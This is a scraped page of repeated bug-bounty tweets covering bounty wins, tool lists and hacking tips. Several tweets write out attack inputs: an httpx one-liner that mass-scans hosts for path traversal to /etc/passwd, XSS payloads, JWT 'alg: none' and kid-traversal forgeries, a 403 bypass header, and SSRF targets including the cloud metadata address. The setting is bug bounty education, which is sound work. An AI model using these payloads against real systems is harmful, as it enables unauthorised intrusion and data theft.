#BugBountyTips of the Day
Yay, I was awarded 200$ bounty on @Bugcrowd This one is my first bounty ever. It will motivate me a lot for my future journey.And specially thanks to @EmptyMahbob for always your support and @GodfatherOrwa for always sharing some unique tips. #bugbounty #TogetherWeHitHarder https://t.co/BNIXCsVpIt
---
Pro tip for #bugbounty: Go over all URLs to test at least three times, preferably on separate days. On the first pass, I find the most stuff. On the 2nd pass, I find most issues I missed. On the 3rd pass, I barely find anything at all but still have usually missed a few. 😜🥳
---
CVE-2022-32275 😶 #BugBounty https://t.co/h9MO9vKLro
---
For Beginners https://t.co/kUzws8Mxz1 #bugbountytips #infosec #cybersecurity
---
Today somehow popped a shell on the main application a major cryptocurrency exchange. The impact is as devastating as the Web3 bugs you could have seen recently on other programs. The report was sent to their security team. Web2 bugs are alive. #bugbounty https://t.co/DrN23ItZxT
Yay, I was awarded 200$ bounty on @Bugcrowd This one is my first bounty ever. It will motivate me a lot for my future journey.And specially thanks to @EmptyMahbob for always your support and @GodfatherOrwa for always sharing some unique tips. #bugbounty #TogetherWeHitHarder https://t.co/BNIXCsVpIt
---
Pro tip for #bugbounty: Go over all URLs to test at least three times, preferably on separate days. On the first pass, I find the most stuff. On the 2nd pass, I find most issues I missed. On the 3rd pass, I barely find anything at all but still have usually missed a few. 😜🥳
---
CVE-2022-32275 😶 #BugBounty https://t.co/h9MO9vKLro
---
For Beginners https://t.co/kUzws8Mxz1 #bugbountytips #infosec #cybersecurity
---
Today somehow popped a shell on the main application a major cryptocurrency exchange. The impact is as devastating as the Web3 bugs you could have seen recently on other programs. The report was sent to their security team. Web2 bugs are alive. #bugbounty https://t.co/DrN23ItZxT
Twitter
XC0D3R(Joy ahmed)🇧🇩
Yay, I was awarded 200$ bounty on @Bugcrowd This one is my first bounty ever. It will motivate me a lot for my future journey.And specially thanks to @EmptyMahbob for always your support and @GodfatherOrwa for always sharing some unique tips. #bugbounty …
#BugBountyTips of the Day
CRLF Suite - Automated Injection Toolkit (very fast) - Repo: https://t.co/vgRW4llTwz - Creator: Nefcore Security - #CyberSecurity #bugbountytips #CTF #infosec https://t.co/mqNC5dWvp8
---
Subdomain Enumeration Automation Script ⚙️ #bugbountytips https://t.co/4qEU0OyvGY
---
New Write-up on InfoSec Write-ups publication : "Detecting DNS Tunneling using Spark Structured Streaming" #bugbounty #bugbountywriteup #bugbountytips https://t.co/rJoYv2EBba
---
Yay, I was awarded a $1,000 bounty on @Hacker0x01 for Exposed Secrets! https://t.co/JJsoq3ZO3t #bugbountytips #BugBounty #TogetherWeHitHarder https://t.co/7cT0ddkWSv
---
A little ahead of schedule, the new video on my 2-week experience (#bugbounty hunting part-time) with the Pinterest program is live. Hopefully there are some pearls of information that help others out. This was almost entirely manual testing! https://t.co/BJTZJCY7hp
---
Improve your bug hunting 1. Go to @intigriti bug-byte 2. Every bug-byte blog post contains tools section 3. There are bug-byte blogs. 4. Spend time and learn about tools #bugbountytips #bugbounty @ADITYASHENDE17
---
Aki's beta version is live now🔥 Let your web3 voices be heared! Leave your comments below 👇👇 and win the 💰💰💰 #bugbountytips #BugBounty #Pentesting https://t.co/C8M6hamfCX
---
I earned $3,600 for my submission on @bugcrowd https://t.co/adNqMtZ00S #ItTakesACrowd It was a DOM based XSS escalated to a one-click Account Takeover, at one of the oldest public program of Bugcrowd. #cybersecurity #bugbounty #infosec #hacking #informationsecurity #hackerone https://t.co/d1Rzqadesg
---
Python Debugging Cheat Sheet #MachineLearning #python #IoT #100DaysOfCode #programming #CodeNewbie #reactjs #bugbounty #DataScience #gamedev #BigData #Analytics #NeuralNetworks #Cloud #OpenSource #AI #5G #DEVCommunity #codinglife #Automation #FutureOfWork #RPA @SourabhSKatoch https://t.co/tzeEtf8ZOq
---
API Bug-Bounty Tools Check list (Part - 1) -> Postman (It is like Burpsuite for API) -> APISec -> AppKnox -> Synopsis API Scanner -> Data Theorem API Secure #cybersecuritytips #bugbountytips #bugbounty #TweetOfTheDay #CyberSecurity #100daysofbugbounty #offensivesecurity #Defcon
CRLF Suite - Automated Injection Toolkit (very fast) - Repo: https://t.co/vgRW4llTwz - Creator: Nefcore Security - #CyberSecurity #bugbountytips #CTF #infosec https://t.co/mqNC5dWvp8
---
Subdomain Enumeration Automation Script ⚙️ #bugbountytips https://t.co/4qEU0OyvGY
---
New Write-up on InfoSec Write-ups publication : "Detecting DNS Tunneling using Spark Structured Streaming" #bugbounty #bugbountywriteup #bugbountytips https://t.co/rJoYv2EBba
---
Yay, I was awarded a $1,000 bounty on @Hacker0x01 for Exposed Secrets! https://t.co/JJsoq3ZO3t #bugbountytips #BugBounty #TogetherWeHitHarder https://t.co/7cT0ddkWSv
---
A little ahead of schedule, the new video on my 2-week experience (#bugbounty hunting part-time) with the Pinterest program is live. Hopefully there are some pearls of information that help others out. This was almost entirely manual testing! https://t.co/BJTZJCY7hp
---
Improve your bug hunting 1. Go to @intigriti bug-byte 2. Every bug-byte blog post contains tools section 3. There are bug-byte blogs. 4. Spend time and learn about tools #bugbountytips #bugbounty @ADITYASHENDE17
---
Aki's beta version is live now🔥 Let your web3 voices be heared! Leave your comments below 👇👇 and win the 💰💰💰 #bugbountytips #BugBounty #Pentesting https://t.co/C8M6hamfCX
---
I earned $3,600 for my submission on @bugcrowd https://t.co/adNqMtZ00S #ItTakesACrowd It was a DOM based XSS escalated to a one-click Account Takeover, at one of the oldest public program of Bugcrowd. #cybersecurity #bugbounty #infosec #hacking #informationsecurity #hackerone https://t.co/d1Rzqadesg
---
Python Debugging Cheat Sheet #MachineLearning #python #IoT #100DaysOfCode #programming #CodeNewbie #reactjs #bugbounty #DataScience #gamedev #BigData #Analytics #NeuralNetworks #Cloud #OpenSource #AI #5G #DEVCommunity #codinglife #Automation #FutureOfWork #RPA @SourabhSKatoch https://t.co/tzeEtf8ZOq
---
API Bug-Bounty Tools Check list (Part - 1) -> Postman (It is like Burpsuite for API) -> APISec -> AppKnox -> Synopsis API Scanner -> Data Theorem API Secure #cybersecuritytips #bugbountytips #bugbounty #TweetOfTheDay #CyberSecurity #100daysofbugbounty #offensivesecurity #Defcon
GitHub
GitHub - Nefcore/CRLFsuite: The most powerful CRLF injection (HTTP Response Splitting) scanner.
The most powerful CRLF injection (HTTP Response Splitting) scanner. - GitHub - Nefcore/CRLFsuite: The most powerful CRLF injection (HTTP Response Splitting) scanner.
#BugBountyTips of the Day
A simple and an easy finding on @Hacker0x01 While fuzzing, server-status endpoint was forbidden (403) Just added this header in request : X-Forwarded-For: 127.0.0.1 and I was able to bypass the forbidden (403) url or page. @ADITYASHENDE17 #bugbounty #togetherwehitharder https://t.co/Ut6PGmFTky
---
New web #pentesting video is live on the methodology of testing File Upload dialogues which can lead to stored HTML injection, XSS, XXE, SSRF, and RCE. The goal is to bypass or trick the content "restrictions". #bugbountytips #infosec #bugbounty https://t.co/vSZ1Beg4JV
---
Always wanted this "Hacking Hackers" badge. Finally got it !! @Hacker0x01 Now Next goal is to participate in Live Hacking Events, hopefully I get a chance this year :) #TogetherWeHitHarder #bugbounty #cybersecurity https://t.co/aaY5IdLyhW
---
Yay, I was awarded $200 bounty on @Hacker0x01 @ADITYASHENDE17 #bugbounty #togetherwehitharder https://t.co/l9zE6zwKr2
---
CVE-2022-1388: F5 BIG-IP 🔥 #infosec #bugbounty https://t.co/UbXXvL9j9L
A simple and an easy finding on @Hacker0x01 While fuzzing, server-status endpoint was forbidden (403) Just added this header in request : X-Forwarded-For: 127.0.0.1 and I was able to bypass the forbidden (403) url or page. @ADITYASHENDE17 #bugbounty #togetherwehitharder https://t.co/Ut6PGmFTky
---
New web #pentesting video is live on the methodology of testing File Upload dialogues which can lead to stored HTML injection, XSS, XXE, SSRF, and RCE. The goal is to bypass or trick the content "restrictions". #bugbountytips #infosec #bugbounty https://t.co/vSZ1Beg4JV
---
Always wanted this "Hacking Hackers" badge. Finally got it !! @Hacker0x01 Now Next goal is to participate in Live Hacking Events, hopefully I get a chance this year :) #TogetherWeHitHarder #bugbounty #cybersecurity https://t.co/aaY5IdLyhW
---
Yay, I was awarded $200 bounty on @Hacker0x01 @ADITYASHENDE17 #bugbounty #togetherwehitharder https://t.co/l9zE6zwKr2
---
CVE-2022-1388: F5 BIG-IP 🔥 #infosec #bugbounty https://t.co/UbXXvL9j9L
Twitter
Ali Hassan Khan
A simple and an easy finding on @Hacker0x01 While fuzzing, server-status endpoint was forbidden (403) Just added this header in request : X-Forwarded-For: 127.0.0.1 and I was able to bypass the forbidden (403) url or page. @ADITYASHENDE17 #bugbounty #tog…
#BugBountyTips of the Day
Ever noticed WebSocket requests while intercepting traffic in Burp Suite🤔 This thread🧵is for you don't know what it is and how it works! We're going to cover a short brief on Websockets in this thread🚀 (1/n) #bugbounties #bugbountytips #wapt #websockets
---
[BugBounty] Tips to Find Stored XSS - @bigb0ss___ https://t.co/5RMrt2ev1g #InfoSec #CyberSecurity #Security #BugBounty #XSS
---
Learn Account Takeover With CSRF - My First Bug on @BugBountyHunt3r with methodology by @zseano and @theXSSrat https://t.co/SqSu4ocvqr #myfirstbug #BugBounty #bugbountytips #hackers https://t.co/nKEOaCdNtm
---
> Quickly discover your target site's open ports with multiple search engines. uncover -q " https://t.co/PZPWw6V9QW" -e censys,fofa,shodan > Tool: https://t.co/QA0XoW2USI #bugbounty #bugbountytips #networkscan #penetrationtesting https://t.co/ILcewOSVM9
Ever noticed WebSocket requests while intercepting traffic in Burp Suite🤔 This thread🧵is for you don't know what it is and how it works! We're going to cover a short brief on Websockets in this thread🚀 (1/n) #bugbounties #bugbountytips #wapt #websockets
---
[BugBounty] Tips to Find Stored XSS - @bigb0ss___ https://t.co/5RMrt2ev1g #InfoSec #CyberSecurity #Security #BugBounty #XSS
---
Learn Account Takeover With CSRF - My First Bug on @BugBountyHunt3r with methodology by @zseano and @theXSSrat https://t.co/SqSu4ocvqr #myfirstbug #BugBounty #bugbountytips #hackers https://t.co/nKEOaCdNtm
---
> Quickly discover your target site's open ports with multiple search engines. uncover -q " https://t.co/PZPWw6V9QW" -e censys,fofa,shodan > Tool: https://t.co/QA0XoW2USI #bugbounty #bugbountytips #networkscan #penetrationtesting https://t.co/ILcewOSVM9
Medium
[BugBounty] Tips to Find Stored XSS
Intro
#BugBountyTips of the Day
Want to quickly find publicly exposed MySql backup files? Try this 👇 Credits: @_bughunter #recontips #AttackSurface #bugbountytips #mysql #reconone https://t.co/n1HrXC5yRT
---
#bugbountytips #bugbounty I just published 0 Day Vulnerability — URI Normalization Issue — Access the Internal Tomcat Server #Apache https://t.co/p1fIxzDHFz https://t.co/NbN27UTfg6
---
Best ever Tools 🔧 for Bug Bounty Hunters... →Amass →Sublister →Gauplus →HTTPX →Gf tool →Kxss →Sqlmap →Commix →Tplmap →HYDRA →John the ripper →Burpsuite →Arjun →Paramspider →NoSQLmap →NMAP →Nikto →FFUF →403-Bypass →Gobuster #bugbounty #cybersecurity
---
Best of Nmap Cheat Sheet Credit: @mohamedmaly #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity https://t.co/hRLvLse6fY
---
Found a self-XSS? 🤨 Don't worry! Let's magically turn that into a valid XSS by sprinkling some CSRF on top of it! 🧙♂️ #bugbounty #bugbountytips 👇 https://t.co/wbV6Sa1UEB
---
Linux Path Cheat Sheet :- #infosec #CyberSecurity #Hacking #cyber #infosecurity #Pentesting #nmap #cyberattack #Linux #AWS #opensource #security #MachineLearning #DataScience #DataAnalytics #bugbounty https://t.co/3Bdvgdzaex
---
Bug: Race condition attack [Medium] Tip: 1. Capture request on adding link/follow user's 2. Send to Turbo Intruder >> Attack with https://t.co/GHu42ZBab8 code 3. Numerous key links generated / Follower's no. increased #bugbounty #bugbountytips #hackerone https://t.co/dvfqAXv77z
---
Hello all! I released a new write up about bug bounty. Click below link to read it and enjoy! https://t.co/c5zyrkckua #bugbounty #bugbountytips @Hacker0x01 @Bugcrowd
Want to quickly find publicly exposed MySql backup files? Try this 👇 Credits: @_bughunter #recontips #AttackSurface #bugbountytips #mysql #reconone https://t.co/n1HrXC5yRT
---
#bugbountytips #bugbounty I just published 0 Day Vulnerability — URI Normalization Issue — Access the Internal Tomcat Server #Apache https://t.co/p1fIxzDHFz https://t.co/NbN27UTfg6
---
Best ever Tools 🔧 for Bug Bounty Hunters... →Amass →Sublister →Gauplus →HTTPX →Gf tool →Kxss →Sqlmap →Commix →Tplmap →HYDRA →John the ripper →Burpsuite →Arjun →Paramspider →NoSQLmap →NMAP →Nikto →FFUF →403-Bypass →Gobuster #bugbounty #cybersecurity
---
Best of Nmap Cheat Sheet Credit: @mohamedmaly #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity https://t.co/hRLvLse6fY
---
Found a self-XSS? 🤨 Don't worry! Let's magically turn that into a valid XSS by sprinkling some CSRF on top of it! 🧙♂️ #bugbounty #bugbountytips 👇 https://t.co/wbV6Sa1UEB
---
Linux Path Cheat Sheet :- #infosec #CyberSecurity #Hacking #cyber #infosecurity #Pentesting #nmap #cyberattack #Linux #AWS #opensource #security #MachineLearning #DataScience #DataAnalytics #bugbounty https://t.co/3Bdvgdzaex
---
Bug: Race condition attack [Medium] Tip: 1. Capture request on adding link/follow user's 2. Send to Turbo Intruder >> Attack with https://t.co/GHu42ZBab8 code 3. Numerous key links generated / Follower's no. increased #bugbounty #bugbountytips #hackerone https://t.co/dvfqAXv77z
---
Hello all! I released a new write up about bug bounty. Click below link to read it and enjoy! https://t.co/c5zyrkckua #bugbounty #bugbountytips @Hacker0x01 @Bugcrowd
Twitter
ReconOne
Want to quickly find publicly exposed MySql backup files? Try this 👇 Credits: @_bughunter #recontips #AttackSurface #bugbountytips #mysql #reconone
#BugBountyTips of the Day
Admin Panel Finder - A burp suite extension that enumerates infrastructure and application admin interfaces https://t.co/ziAH4ydnbl #cybersecurity #bugbountytips #infosec https://t.co/3FaUWDomx9
---
reconFTW v2.3.1 is out with - Added ripgen @resync_gg @d0nutptr as option for permutations - Added dsieve @trick3st - Replaced nrich with smap @s0md3v - Get fresh resolvers before resolution - Added timeout option to gotator https://t.co/p3ENLkUAev #bugbounty #recon #hacking https://t.co/IcEQWnqW4H
---
Lets find some criticals at scale 🔥🔥🔥 cat hosts | httpx -nc -t 300 -p 80,443,8080,8443,8888,8088 -path "/jobmanager/logs/..%252f..%252f..%252f......%252f..%252fetc%252fpasswd" -mr "root:x" -silent https://t.co/iVfwQiPFSy #bugbountytips #bugbountytip #bugbounty
---
Bug Bounty Free Learning Materials Follow this thread if you can’t google and learn things😅 #bugbounty #bugbountytip #bugbountytips
---
Github dorks Bug hunting for beginners #Tips #bugbounty #github #Linux #programming https://t.co/JvsDHXOozT
---
#Giveaway I'm giving away either a @PentesterLab pro Voucher or @hackthebox_eu VIP+ Voucher (winner's choice). Like and retweet this for a chance to win. Follow for more giveaways this week. Feeling generous while the wife and I are recovering from surgeries #bugbounty #redteam
Admin Panel Finder - A burp suite extension that enumerates infrastructure and application admin interfaces https://t.co/ziAH4ydnbl #cybersecurity #bugbountytips #infosec https://t.co/3FaUWDomx9
---
reconFTW v2.3.1 is out with - Added ripgen @resync_gg @d0nutptr as option for permutations - Added dsieve @trick3st - Replaced nrich with smap @s0md3v - Get fresh resolvers before resolution - Added timeout option to gotator https://t.co/p3ENLkUAev #bugbounty #recon #hacking https://t.co/IcEQWnqW4H
---
Lets find some criticals at scale 🔥🔥🔥 cat hosts | httpx -nc -t 300 -p 80,443,8080,8443,8888,8088 -path "/jobmanager/logs/..%252f..%252f..%252f......%252f..%252fetc%252fpasswd" -mr "root:x" -silent https://t.co/iVfwQiPFSy #bugbountytips #bugbountytip #bugbounty
---
Bug Bounty Free Learning Materials Follow this thread if you can’t google and learn things😅 #bugbounty #bugbountytip #bugbountytips
---
Github dorks Bug hunting for beginners #Tips #bugbounty #github #Linux #programming https://t.co/JvsDHXOozT
---
#Giveaway I'm giving away either a @PentesterLab pro Voucher or @hackthebox_eu VIP+ Voucher (winner's choice). Like and retweet this for a chance to win. Follow for more giveaways this week. Feeling generous while the wife and I are recovering from surgeries #bugbounty #redteam
GitHub
GitHub - moeinfatehi/Admin-Panel_Finder: A burp suite extension that enumerates infrastructure and application admin interfaces…
A burp suite extension that enumerates infrastructure and application admin interfaces (OTG-CONFIG-005) - GitHub - moeinfatehi/Admin-Panel_Finder: A burp suite extension that enumerates infrastruct...
#BugBountyTips of the Day
During @Hacker0x01 Ambassador Worldcup We (me, @rotembar and @realgam3) found DOM Based XSS that affected 6.5m+ Elementor websites, leading to 1 click WordPress panel takeover. Full writeup on Rotem's blog -> https://t.co/AfMwENptlt #BugBounty #BugBountyTips
---
When a random stranger I gifted my #bugbounty course to comes back a couple of months later to pay back.. I'm humbly proud. Keep shining 🌟 https://t.co/p5G0vhDko6 https://t.co/nPazn55ean
---
Ways to bypass JSON Web Token controls:✅Tip1 ▶️The header part: { "alg" : "HS256", "typ" : "JWT" } ▶️Bypass::> Simple Temper the algorithm type: { "alg" : "none", "typ" : "JWT" } { "user" : "admin" } #bugbountytips #infosec #infosecurity #appsec
---
#Learnwithxssmice Top Burp Suite Extensions For Improving Bug Bounty 1. AUTHMATRIX 2. AUTHZ 3. AUTHORIZE 4. BLACKSLASH POWERED SCANNER 5. COLLABORATOR EVERYWHERE @theXSSrat @ADITYASHENDE17 @Agarri_FR @ghostlulz1337 @j33n1k4 @rbhichher #bugbounty #pentest Thread Continues
---
Best ever Tools 🔧 for Bug Bounty Hunters... via@Lohitaksh @ADITYASHENDE17 @Assass1nmarcos @Alra3ees #infosec #bugbounty #bugbountytips #xss https://t.co/bzGXfuie0g
---
Top story: @kakarstoreshop: 'Skills of #sciencetwitter #Cloud #MachineLearning #python #IoT #100DaysOfCode #programming #CodeNewbie #reactjs #bugbounty #DataScience #gamedev #BigData #Analytics #NeuralNetworks #Comput… https://t.co/kdy3APvGoI, see more https://t.co/CYJi5BLBS8
---
How to find SQL Injection at scale? Try this 👇 #recontips #AttackSurface #bugbountytips #reconone #BugBounty #sqlmap https://t.co/Ickwvh0Cz9
---
Digital Forensics and Incident Response Cheat Sheet Credit: @sansforensics #infosec #cybersecurity #pentesting #oscp #informationsecurity #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity #cybersecurityawareness https://t.co/Wa0QJdMspq
---
#bugbountytip So many bug hunters use RXSS scanners on WayBack data blindly. But All Wayback data response MIME type is not HTML, right? Filter out HTML MIME type and run your scanner or look for reflected param then XSS manually. This is how you will save a lot of time :) https://t.co/f4otFkpJ3v
During @Hacker0x01 Ambassador Worldcup We (me, @rotembar and @realgam3) found DOM Based XSS that affected 6.5m+ Elementor websites, leading to 1 click WordPress panel takeover. Full writeup on Rotem's blog -> https://t.co/AfMwENptlt #BugBounty #BugBountyTips
---
When a random stranger I gifted my #bugbounty course to comes back a couple of months later to pay back.. I'm humbly proud. Keep shining 🌟 https://t.co/p5G0vhDko6 https://t.co/nPazn55ean
---
Ways to bypass JSON Web Token controls:✅Tip1 ▶️The header part: { "alg" : "HS256", "typ" : "JWT" } ▶️Bypass::> Simple Temper the algorithm type: { "alg" : "none", "typ" : "JWT" } { "user" : "admin" } #bugbountytips #infosec #infosecurity #appsec
---
#Learnwithxssmice Top Burp Suite Extensions For Improving Bug Bounty 1. AUTHMATRIX 2. AUTHZ 3. AUTHORIZE 4. BLACKSLASH POWERED SCANNER 5. COLLABORATOR EVERYWHERE @theXSSrat @ADITYASHENDE17 @Agarri_FR @ghostlulz1337 @j33n1k4 @rbhichher #bugbounty #pentest Thread Continues
---
Best ever Tools 🔧 for Bug Bounty Hunters... via@Lohitaksh @ADITYASHENDE17 @Assass1nmarcos @Alra3ees #infosec #bugbounty #bugbountytips #xss https://t.co/bzGXfuie0g
---
Top story: @kakarstoreshop: 'Skills of #sciencetwitter #Cloud #MachineLearning #python #IoT #100DaysOfCode #programming #CodeNewbie #reactjs #bugbounty #DataScience #gamedev #BigData #Analytics #NeuralNetworks #Comput… https://t.co/kdy3APvGoI, see more https://t.co/CYJi5BLBS8
---
How to find SQL Injection at scale? Try this 👇 #recontips #AttackSurface #bugbountytips #reconone #BugBounty #sqlmap https://t.co/Ickwvh0Cz9
---
Digital Forensics and Incident Response Cheat Sheet Credit: @sansforensics #infosec #cybersecurity #pentesting #oscp #informationsecurity #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity #cybersecurityawareness https://t.co/Wa0QJdMspq
---
#bugbountytip So many bug hunters use RXSS scanners on WayBack data blindly. But All Wayback data response MIME type is not HTML, right? Filter out HTML MIME type and run your scanner or look for reflected param then XSS manually. This is how you will save a lot of time :) https://t.co/f4otFkpJ3v
My Publications
Hacking 6.5+ million websites => CVE-2022-29455 (Elementor)
Please upgrade your Elementor websites
#BugBountyTips of the Day
2FA Bypass Testing ( Method 12 ) ==> #WayToInject => Try To Use SOAP Endpoint To Bypass 2FA. #CipherEra #VedixEra #AlphaEraX #bugbounty #bugbountytips #redteam #offensivesecurity #cybersecuritytips #cybersecurity https://t.co/cMCiLKm0tg
---
$5000 bounty Today is different, I’m the GOAT of this game #bugbounty @Bugcrowd https://t.co/2dgbsqs9d5
---
MSRC took over 4 months to fix the root cause, and awarded this issue a $60,000 #BugBounty. So… What were the key mistakes? (9/11)
---
Normal Localhost for most server lives at 127.0.0.1 but if you find AWS Ec2 Instance and want to try #SSRF then try 169.254.169.254 because this is AWS Localhost. Normal Server: 127.0.0.1 AWS EC2 Instance:169.254.169.254 #bugbountytips #aws #cybersecurity
---
I create a custom nuclei template for mass hunting recent CVE-2022-29455(XSS) #bugbounty #nuclei https://t.co/uMC9ldy3CJ
2FA Bypass Testing ( Method 12 ) ==> #WayToInject => Try To Use SOAP Endpoint To Bypass 2FA. #CipherEra #VedixEra #AlphaEraX #bugbounty #bugbountytips #redteam #offensivesecurity #cybersecuritytips #cybersecurity https://t.co/cMCiLKm0tg
---
$5000 bounty Today is different, I’m the GOAT of this game #bugbounty @Bugcrowd https://t.co/2dgbsqs9d5
---
MSRC took over 4 months to fix the root cause, and awarded this issue a $60,000 #BugBounty. So… What were the key mistakes? (9/11)
---
Normal Localhost for most server lives at 127.0.0.1 but if you find AWS Ec2 Instance and want to try #SSRF then try 169.254.169.254 because this is AWS Localhost. Normal Server: 127.0.0.1 AWS EC2 Instance:169.254.169.254 #bugbountytips #aws #cybersecurity
---
I create a custom nuclei template for mass hunting recent CVE-2022-29455(XSS) #bugbounty #nuclei https://t.co/uMC9ldy3CJ
Twitter
Deepak Choudhary
2FA Bypass Testing ( Method 12 ) ==> #WayToInject => Try To Use SOAP Endpoint To Bypass 2FA. #CipherEra #VedixEra #AlphaEraX #bugbounty #bugbountytips #redteam #offensivesecurity #cybersecuritytips #cybersecurity
#BugBountyTips of the Day
Yay, I was awarded a $1,300 bounty on @Hacker0x01! , for missing rate limit at login page 🥳 #bugbountytips #BugBounty #hackers #hackerone https://t.co/573zhTBDV8 #TogetherWeHitHarder https://t.co/BgsjJAU85h
---
Ways to bypass JSON Web Token controls:✅Tip2 ▶️KID manipulation: { "alg" : "HS256", "typ" : "JWT" "kid" : "1" } If field is controlled by the user, it can be manipulated by attackers to lead: ▶️Directory traversal: “kid”: “../../etc/groups” #bugbountytips #infosecurity
---
Bug: RXSS #xss #bugbounty payload: %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E payload: %22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E https://t.co/fwXZQOWKCT
---
New video on the #bugbounty hunting process that helped me go from $0 to $150,000/mo on #bugcrowd! I believe if you follow these (5) steps it will help those struggling to find valid #cybersecurity bugs. I focus on #hacking #infosecurity. ❤️☝️ https://t.co/SaEvg28Sen
---
Basic Linux Commands Credit: @securitygull #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity #cybersecurityawareness https://t.co/syaZrv5lxs
---
A quick SSRF Bypass Explanation: Type in http://2130706433 instead of http://127.0.0.1, it would still be understood! Replace: 127.0.0.1 with 2130706433 Explanation Continued in Thread👇 #bugbountytips #ssrf #infosec #bughunting
---
Hi community! YokaiSwap Godwoken V1.1 testnet online now👹⚡️ Let's go test and find the bug🐞! 💫Together we create a secure environment for everyone💫 🧐Details: https://t.co/CcdLaOOsHF #bugbounty #Godwoken $YOK
Yay, I was awarded a $1,300 bounty on @Hacker0x01! , for missing rate limit at login page 🥳 #bugbountytips #BugBounty #hackers #hackerone https://t.co/573zhTBDV8 #TogetherWeHitHarder https://t.co/BgsjJAU85h
---
Ways to bypass JSON Web Token controls:✅Tip2 ▶️KID manipulation: { "alg" : "HS256", "typ" : "JWT" "kid" : "1" } If field is controlled by the user, it can be manipulated by attackers to lead: ▶️Directory traversal: “kid”: “../../etc/groups” #bugbountytips #infosecurity
---
Bug: RXSS #xss #bugbounty payload: %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E payload: %22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E https://t.co/fwXZQOWKCT
---
New video on the #bugbounty hunting process that helped me go from $0 to $150,000/mo on #bugcrowd! I believe if you follow these (5) steps it will help those struggling to find valid #cybersecurity bugs. I focus on #hacking #infosecurity. ❤️☝️ https://t.co/SaEvg28Sen
---
Basic Linux Commands Credit: @securitygull #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity #cybersecurityawareness https://t.co/syaZrv5lxs
---
A quick SSRF Bypass Explanation: Type in http://2130706433 instead of http://127.0.0.1, it would still be understood! Replace: 127.0.0.1 with 2130706433 Explanation Continued in Thread👇 #bugbountytips #ssrf #infosec #bughunting
---
Hi community! YokaiSwap Godwoken V1.1 testnet online now👹⚡️ Let's go test and find the bug🐞! 💫Together we create a secure environment for everyone💫 🧐Details: https://t.co/CcdLaOOsHF #bugbounty #Godwoken $YOK
HackerOne
HackerOne profile - kassem_s94
hacker at night , 🌵 eBay HOF -
#BugBountyTips of the Day
Here is a writeup about a vulnerability and bypass i found in Meta's bug bounty program worth 10K USD. #bugbounty #facebookwhitehat https://t.co/rZsjL46cAR
---
Just published new writeup, you can find it here: #bugbounty #bugbountytips #CVE https://t.co/OeBRRYIxf6
---
Do you want to focus on "Interesting" subdomains only? Try this 👇 #recontips #bugbountytips #recon #AttackSurface #subdomains #reconone https://t.co/si7881nCAS
---
Start reading security articles/write ups of topic you don’t know , you will never get 95% of what the article is explaining but the other 5% stays in your mind and help you later when you are on the edge of exploiting p1 bug. Try it, this works. #infosec #bugbountytips #advice
---
How to approach a BUG HUNTING TARGET? (Fast and Furious Technique) #bugbountytips #spinthehack #infosec https://t.co/tpoBO1Jkyu
---
API Bug-Bounty Tools Checklist (Part-2) -> Astra -> crAPI -> Curity Identity Server (Community Edition) -> JWT_io -> OAuth Tools -> HAWK Authentication #bugbounty #bugbountytip #cybersecurity #cybersecuritytips #TweetOfTheDay #offensivesecurity #100daysofbugbounty #DEFCON30
Here is a writeup about a vulnerability and bypass i found in Meta's bug bounty program worth 10K USD. #bugbounty #facebookwhitehat https://t.co/rZsjL46cAR
---
Just published new writeup, you can find it here: #bugbounty #bugbountytips #CVE https://t.co/OeBRRYIxf6
---
Do you want to focus on "Interesting" subdomains only? Try this 👇 #recontips #bugbountytips #recon #AttackSurface #subdomains #reconone https://t.co/si7881nCAS
---
Start reading security articles/write ups of topic you don’t know , you will never get 95% of what the article is explaining but the other 5% stays in your mind and help you later when you are on the edge of exploiting p1 bug. Try it, this works. #infosec #bugbountytips #advice
---
How to approach a BUG HUNTING TARGET? (Fast and Furious Technique) #bugbountytips #spinthehack #infosec https://t.co/tpoBO1Jkyu
---
API Bug-Bounty Tools Checklist (Part-2) -> Astra -> crAPI -> Curity Identity Server (Community Edition) -> JWT_io -> OAuth Tools -> HAWK Authentication #bugbounty #bugbountytip #cybersecurity #cybersecuritytips #TweetOfTheDay #offensivesecurity #100daysofbugbounty #DEFCON30
Medium
Messenger leaking victim’s video though victim gets popup/whole screen UI saying his video isn’t being shared.
After finding a few technical bugs on fb program, i was looking in new programs and then I read about how Facetime had leaked audio if you…
#BugBountyTips of the Day
Wanna find bugs before anyone else? #bugbountytip #bugbounty 1. Let's say you have scope,text 2. You run your tools to find domains and save them to subs,text Everyday when you go to sleep run cat scope,txt | domain tools | anew subs,txt | tee -a newly-appear-doman,txt 1/2
---
Scavenger - Burp extension to create target-specific and tailored wordlist from burp history. » https://t.co/FEdtP1fCWh #cybersecurity #infosec #bugbountytips https://t.co/lZ3tUW8FUY
Wanna find bugs before anyone else? #bugbountytip #bugbounty 1. Let's say you have scope,text 2. You run your tools to find domains and save them to subs,text Everyday when you go to sleep run cat scope,txt | domain tools | anew subs,txt | tee -a newly-appear-doman,txt 1/2
---
Scavenger - Burp extension to create target-specific and tailored wordlist from burp history. » https://t.co/FEdtP1fCWh #cybersecurity #infosec #bugbountytips https://t.co/lZ3tUW8FUY
GitHub
GitHub - 0xDexter0us/Scavenger: Burp extension to create target specific and tailored wordlist from burp history.
Burp extension to create target specific and tailored wordlist from burp history. - GitHub - 0xDexter0us/Scavenger: Burp extension to create target specific and tailored wordlist from burp history.
#BugBountyTips of the Day
